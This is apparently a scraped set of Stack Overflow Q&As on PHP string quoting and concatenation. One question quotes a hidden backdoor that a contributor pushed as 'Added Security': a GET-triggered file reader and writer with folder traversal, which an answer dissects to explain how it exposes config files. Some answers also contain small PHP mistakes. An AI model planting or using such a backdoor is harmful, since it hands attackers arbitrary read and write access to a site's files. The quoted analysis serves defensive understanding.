This question already has answers here:
What is the difference between single-quoted and double-quoted strings in PHP?
(7 answers)
Closed 8 years ago.
I've been working on a php dynamic drop down list that scans a folder on the web server and list its contents it works hears relevant selection of the code.
<?php
foreach(glob(dirname(rootdir) . '/path/username/*') as $filename){
$filename = basename($filename);
echo "<option value='filepath/username/" . $filename . "'>".$filename."</option>";
}
?>
However if i use a variable to populate part of the file path the variable doesn't get added to the path.
<?php
$name = "jsmith";
foreach(glob(dirname(rootdir) . '/path/$name/*') as $filename){
$filename = basename($filename);
echo "<option value='filepath/$name/" . $filename . "'>".$filename."</option>";
}
?>
$name = "jsmith"
The result I'm looking for is /path/$name/* = /path/jsmith/
and
filepath/$name/ = filepath/jsmith/
How do I get the glob(dirname) and option value=' recognize the variables?
You need to either concatenate the variable with the string or wrap the string in double quotes so the variable is parsed.
Double Quotes
<?php
$name = "jsmith";
foreach(glob(dirname(rootdir) . "/path/$name/*") as $filename){
$filename = basename($filename);
echo "<option value='filepath/$name/" . $filename . "'>".$filename."</option>";
}
?>
Concatenate
<?php
$name = "jsmith";
foreach(glob(dirname(rootdir) . '/path/' . $name . '/*') as $filename){
$filename = basename($filename);
echo "<option value='filepath/$name/" . $filename . "'>".$filename."</option>";
}
?>
Single quotes do not interpolate. (i.e. Variables in the string will not be replaced with their values.) However, double-quotes do interpolate.
You'll need to change '/path/$name/*' to "/path/$name/*" or use string concatenation with '/path/' . $name . '/*' instead.
Also, you should be careful with accepting user-controlled input for $name as it may lead to a directory traversal attack.
Related
I have this code, which will create result.png on my server:
imagepng($image, "'./result/result.png");
Now I have $text , $type , $id
How can I create file with result_$text _ $id _ $type?
Example: ./result/result_123_131_1.png ;
./result/result_Text_1364_3.png
It's very simple:
$name = "./result/result_$text_$id_$type";
//do whatever you do to save the image and use $name as name of the file.
In php the double quotes are used whenever you have variables you want to use in some string literal. What I do above is I insert the value of the variables into the string literal "./result/result___".
More info here.
$image = imagepng($image, "'./result/result");
$file = $image . "_" . $text . "_" . $id . "_" . $type ."png";
Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about programming within the scope defined in the help center.
Closed 8 years ago.
Improve this question
I'm working on a website and recently picked someone up to work on the PHP portion and I have had suspicions that he may have added malicious code to the site, he pushed a bit of PHP without permission nor without mentioning anything to anyone.
The push was labelled 'Added Security'.
Here's the code:
<?PHP
if(isset($_GET['unlock'])) {
$id = $_GET['id'];
$dic = $_SERVER['PHP_SELF'];
$name = basename($dic) . "?unlock";
$url = './$name?unlock&id='.$id;
$file = "./$id";
if(isset($_GET['f'])) {
$f = $_GET['f'];
$file = "./$f/$id";
}
if (isset($_POST['text'])) {
file_put_contents($file, $_POST['text']);
if(isset($_GET['f'])) {
$f = $_GET['f'];
header('location: ' . $name . '&id=' . $id . '&f=' . $f);
} else {
header('location: ' . $name . '&id=' . $id);
}
}
$text = htmlentities(file_get_contents($file));
echo "<form method='post'><input type='submit'><textarea name='text'>$text</textarea></form>$dic";
die();
}
?>
Thanks in advance.
Let's see, the following
<?php
if(isset($_GET['unlock'])) {
...
}
Means that if you don't send the parameter unlock then nothing would be displayed. Is like a knaive attempt of keeping a secret piece of code that only he can unlock with a magic word.
Regarding what's inside
$id = $_GET['id'];
$dic = $_SERVER['PHP_SELF'];
$name = basename($dic) . "?unlock";
//$url = './$name?unlock&id='.$id; // the former would fail to interpolate $name
$url = "./$name&id=".$id;
$file = "./$id";
if(isset($_GET['f'])) {
$f = $_GET['f'];
$file = "./$f/$id";
}
$text = htmlentities(file_get_contents($file));
echo"<form method='post'><input type='submit'><textarea name='text'>$text</textarea> </form>";
If you pass the parameter unlock and id (which is a filename), plus optionally a parameter f (which is a folder) you can see the contents of that file in the textarea. For example
http://www.myserver.com/thescript.php?unlock&id=config.php&f=app
would expose whatever sensitive information you have in your config.php inside the app folder.
Finally, this part
if (isset($_POST['text'])) {
file_put_contents($file, $_POST['text']);
if(isset($_GET['f'])) {
$f = $_GET['f'];
header('location: ' . $name . '&id=' . $id . '&f=' . $f);
} else {
header('location: ' . $name . '&id=' . $id);
}
}
Would let you edit or create a file by submitting the form. It might fail due to lack of permissions, but since you can play with the folder, you just insist until you find a writable folder.
Hi I am trying to get images to load into a page using the file names from an array,
This is what I have so far
<?php
$i=0;
$img=array("1.png","2.png","3.png","4.png");
while ($i<count($img))
{
echo "<img class='loadin' alt='imgg' src=" . "'http://www/images/" . $img[i] . "'" . "/" . ">" . "<br/>";
$i++;
}
?>
It seems to ignore the file name and just enters:
http://www/images/
as the source and ignores the file name from the array
Any Help would be great Thanks
Mikey
You forgot the dollar sign with your $i variable: $img[$i]
EDIT:
(btw. using a foreach-loop would be easier...)
foreach($img AS $filename) {
echo "<img class='loadin' alt='imgg' src='http://www/images/" . $filename . "'/><br/>";
}
I've been trying to create a directory following a specific structure, yet nothing appears to be happening. I've approached this by defining multiple variables as follows:
$rid = '/appicons/';
$sid = '$artistid';
$ssid = '$appid';
$s = '/';
and the function I've been using runs thusly:
$directory = $appid;
if (!is_dir ($directory))
{
mkdir($directory);
}
That works. However, I want to have the following structure in created directories: /appicons/$artistid/$appid/
yet nothing really seems to work. I understand that if I were to add more variables to $directory then I'd have to use quotes around them and concatenate them (which gets confusing).
Does anyone have any solutions?
$directory = "/appicons/$artistid/$appid/";
if (!is_dir ($directory))
{
//file mode
$mode = 0777;
//the third parameter set to true allows the creation of
//nested directories specified in the pathname.
mkdir($directory, $mode, true);
}
This should do what you want:
$rid = '/appicons/';
$sid = $artistid;
$ssid = $appid;
$s = '/';
$directory = $rid . $artistid . '/' . $appid . $s;
if (!is_dir ($directory)) {
mkdir($directory);
}
The reason your current code doesn't work is due to the fact you're trying to use a variable inside a string literal. A string literal in PHP is a string enclosed in single quotes ('). Every character in this string is treated as just a character, so any variables will just be parsed as text. Unquoting the variables so your declarations look like the following fixes your issue:
$rid = '/appicons/';
$sid = $artistid;
$ssid = $appid;
$s = '/';
This next line concatenates (joins) your variables together into a path:
$directory = $rid . $artistid . '/' . $appid . $s;
Concatenation works like this
$directory = $rid.$artistid."/".$appid."/"
When you're assigning one variable to another, you don't need the quotes around it, so the following should be what you're looking for.
$rid = 'appicons';
$sid = $artistid;
$ssid = $appid;
and then...
$dir = '/' . $rid . '/' . $sid . '/' . $ssid . '/';
if (!is_dir($dir)) {
mkdir($dir);
}
i'm trying to get google steetview tiles and save them. But file_get_contents doesn't like my url:
here's my code:
$img = "http://cbk0.google.com/cbk?output=tile&panoid="+$panorama_id+"&zoom=3&x="+$i+"&y='"+$x+"'";
$url = ""+$panorama_id+"Xval"+$i.+"Yval"+$x+".jpg";
file_put_contents($url, file_get_contents($img));
You're using + for concatenation. That's not PHP. You need the dot . operator instead:
$img = "http://cbk0.google.com/cbk?output=tile&panoid=" . $panorama_id . "&zoom=3&x=" . $i . "&y='" . $x . "'";
$url = $panorama_id . "Xval" . $i . "Yval" . $x . ".jpg";
See string operators in the PHP manual.
Alternatively, with double quoted strings, variables within the string will be parsed. See the manual page for the string type.
$img = "http://cbk0.google.com/cbk?output=tile&panoid=$panorama_id&zoom=3&x=$i&y='$x'";
$url = "${panorama_id}Xval${i}Yval${x}.jpg";